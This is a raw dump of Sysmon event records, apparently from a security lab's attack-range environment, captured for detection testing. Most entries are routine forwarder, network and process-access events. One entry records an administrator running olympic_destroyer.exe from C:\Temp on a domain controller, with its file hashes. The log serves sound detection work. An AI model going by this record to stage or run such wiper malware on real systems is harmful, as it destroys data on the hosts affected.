Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5CD91AD45A0D51D92908CBFDEEEC161,SHA256=4C19EA33BA76EADFCEF773330E3A2818F3AE17FFCD1DF3811782B22153DB9753,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:56.992{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0864FFED54AF2952C9FD1907D12B97F9,SHA256=A8AD2C48402019BE92F5511FA1864EDBB3E2513C05E8C369842AD695CC39C2D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217407Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:56.446{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9380683FC859E85055AB44E4ED9DD47F,SHA256=05E5934630EFFCC3E9FAB18B380D481D29AF54E579EFEB015FF36BF2DB888091,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217408Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:57.680{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB2A122FB2AF3667FB8D856B45783973,SHA256=D80B8E259B77491CDA630039592E261B165379BCA970A935E682915B62775522,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217409Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:58.758{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=273B975E521DAC09ACCD783905B19D95,SHA256=634BEC233D5E21454DC35B84469C78B462BEF19FA841624096B4C753ABE34A6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:58.009{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB6D6D3C5A5A6507993AA61342F463F4,SHA256=CAD4BDE9013FFA638C7D5D84A1CD0A58E14E7FEE420714DA04FB0897E1F422B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217411Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:59.977{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93251C192A8916FD9553DDA521A34A3D,SHA256=EFBD83353D27437478D417C6D550D61AC7AD72A298709958F6C32CB9DFAA5613,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:59.561{C8EA50B7-F2AD-6215-C000-000000003802}4856ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Temp\olympic_destroyer.exeMD5=68970B2CD5430C812BEF5B87C1ADD6EA,SHA256=E4E1E3C44E01C60FD433C6283BD8CD15A9941E1CBAAD72E6409CC92E2E91263E,IMPHASH=DA1C2D7ACFE54DF797BFB1F470257BC3truetrue 354300x8000000000000000289474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:56.727{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53537-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:59.025{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5615D40AC926E582D4D5DF6D324A1099,SHA256=3F3A3419ABD24074FB6DAC1A6542A92BC58BAC1FBB4C95530573575A9D3C830B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217410Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:56.454{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51390-false10.0.1.12-8000- 10341000x8000000000000000289472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:59.008{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:00.309{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 